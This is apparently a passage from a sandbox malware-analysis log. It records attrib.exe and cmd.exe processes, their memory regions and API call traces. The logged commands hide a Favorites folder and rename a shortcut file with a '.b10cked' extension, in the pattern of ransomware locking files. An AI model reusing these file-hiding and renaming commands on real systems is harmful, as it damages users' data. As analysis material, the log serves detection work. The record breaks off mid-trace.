"attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16f20" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "520" os_parent_pid = "0xa50" cmd_line = "attrib +h \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31347 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31348 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000030000" filename = "" Region: id = 31349 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31350 start_va = 0xb0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 31351 start_va = 0x2e0000 end_va = 0x2e6fff entry_point = 0x2e0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 31352 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31353 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31354 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 31355 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 31356 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31357 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31358 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31359 start_va = 0xf0000 end_va = 0x156fff entry_point = 0xf0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: 
"c:\\windows\\system32\\locale.nls") Region: id = 31360 start_va = 0x2a0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000002a0000" filename = "" Region: id = 31361 start_va = 0x460000 end_va = 0x55ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 31362 start_va = 0x6e1e0000 end_va = 0x6e1fcfff entry_point = 0x6e1e0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 31363 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31364 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 31365 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31366 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31367 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 31368 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31369 start_va = 0x76b40000 end_va = 0x76c08fff 
entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31370 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31371 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 31372 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31373 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31374 start_va = 0x160000 end_va = 0x227fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000160000" filename = "" Region: id = 31375 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31376 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 724 os_tid = 0x888 Process: id = "524" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16940" os_pid = "0x9d4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 31389 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 31390 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 31391 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 31392 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 31393 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 31394 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 31395 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 31396 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x000000007ffb0000" filename = "" Region: id = 31397 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 31398 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 31459 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 31460 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 31461 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 31462 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 31463 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 31464 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 31465 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 31466 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 31467 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename 
= "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 31468 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 31469 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 31470 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 31471 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 31472 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 31473 start_va = 0x320000 end_va = 0x3e7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 31474 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 31475 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 31476 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 31477 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = 
pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 31478 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 31479 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 31480 start_va = 0x4a0000 end_va = 0x5a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004a0000" filename = "" Region: id = 31481 start_va = 0x5b0000 end_va = 0x11affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 31482 start_va = 0x11b0000 end_va = 0x1312fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011b0000" filename = "" Thread: id = 725 os_tid = 0x9dc [0213.687] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20f884 | out: lpSystemTimeAsFileTime=0x20f884*(dwLowDateTime=0xb42df360, dwHighDateTime=0x1d440a9)) [0213.687] GetCurrentProcessId () returned 0x9d4 [0213.687] GetCurrentThreadId () returned 0x9dc [0213.687] GetTickCount () returned 0x3be10 [0213.687] QueryPerformanceCounter (in: lpPerformanceCount=0x20f87c | out: lpPerformanceCount=0x20f87c*=27047629152) returned 1 [0213.688] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0213.688] __set_app_type (_Type=0x1) [0213.688] __p__fmode () returned 0x76b331f4 [0213.688] __p__commode () returned 0x76b331fc [0213.688] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0213.688] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0213.688] GetCurrentThreadId () returned 0x9dc [0213.688] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9dc) returned 0x38 [0213.688] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 
[0213.688] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0213.688] SetThreadUILanguage (LangId=0x0) returned 0x409 [0213.688] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0213.688] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20f814 | out: phkResult=0x20f814*=0x0) returned 0x2 [0213.688] VirtualQuery (in: lpAddress=0x20f84b, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.688] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0213.689] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0213.689] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0213.689] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20f7e4, dwLength=0x1c | out: lpBuffer=0x20f7e4*(BaseAddress=0x210000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x10000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0213.689] GetConsoleOutputCP () returned 0x1b5 [0213.689] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.689] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0213.689] 
_get_osfhandle (_FileHandle=1) returned 0x7 [0213.689] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0213.689] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.689] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0213.689] _get_osfhandle (_FileHandle=1) returned 0x7 [0213.689] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0213.689] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.689] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0213.689] _get_osfhandle (_FileHandle=0) returned 0x3 [0213.689] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0213.690] GetEnvironmentStringsW () returned 0x2301c8* [0213.690] FreeEnvironmentStringsW (penv=0x2301c8) returned 1 [0213.690] GetEnvironmentStringsW () returned 0x2301c8* [0213.690] FreeEnvironmentStringsW (penv=0x2301c8) returned 1 [0213.690] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e784 | out: phkResult=0x20e784*=0x40) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x0, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x1, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x1, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | 
out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x0, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x40, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x40, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x40, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegCloseKey (hKey=0x40) returned 0x0 [0213.690] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20e784 | out: phkResult=0x20e784*=0x40) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x40, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x1, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x1, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x0, lpcbData=0x20e788*=0x4) 
returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x9, lpcbData=0x20e788*=0x4) returned 0x0 [0213.690] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x4, lpData=0x20e790*=0x9, lpcbData=0x20e788*=0x4) returned 0x0 [0213.691] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20e78c, lpData=0x20e790, lpcbData=0x20e788*=0x1000 | out: lpType=0x20e78c*=0x0, lpData=0x20e790*=0x9, lpcbData=0x20e788*=0x1000) returned 0x2 [0213.691] RegCloseKey (hKey=0x40) returned 0x0 [0213.691] time (in: timer=0x0 | out: timer=0x0) returned 0x5b8863af [0213.691] srand (_Seed=0x5b8863af) [0213.691] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked\"" [0213.691] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IESITE~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MICROS~1\\IE site on Microsoft.com.url.b10cked\"" [0213.691] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.691] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x231928, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0213.691] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0213.691] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0213.691] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.691] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0213.691] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0213.691] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0213.691] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0213.691] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0213.691] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0213.691] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0213.691] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0213.691] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0213.692] GetEnvironmentStringsW () returned 0x232318* [0213.692] FreeEnvironmentStringsW (penv=0x232318) returned 1 [0213.692] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0213.692] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0213.692] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0213.692] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0213.692] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0213.692] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0213.692] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0213.692] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0213.692] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0213.692] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0213.692] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f550 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.692] 
GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x20f550, lpFilePart=0x20f54c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x20f54c*="Desktop") returned 0x18 [0213.692] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.692] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x20f2cc | out: lpFindFileData=0x20f2cc) returned 0x230058 [0213.692] FindClose (in: hFindFile=0x230058 | out: hFindFile=0x230058) returned 1 [0213.692] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x20f2cc | out: lpFindFileData=0x20f2cc) returned 0x230058 [0213.692] FindClose (in: hFindFile=0x230058 | out: hFindFile=0x230058) returned 1 [0213.693] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x20f2cc | out: lpFindFileData=0x20f2cc) returned 0x230058 [0213.693] FindClose (in: hFindFile=0x230058 | out: hFindFile=0x230058) returned 1 [0213.693] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0213.693] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0213.693] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0213.693] GetEnvironmentStringsW () returned 0x232b38* [0213.693] FreeEnvironmentStringsW (penv=0x232b38) returned 1 [0213.693] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0213.693] GetConsoleOutputCP () returned 0x1b5 [0213.694] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0213.694] GetUserDefaultLCID () returned 0x409 [0213.694] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0213.694] GetLocaleInfoW (in: Locale=0x409, 
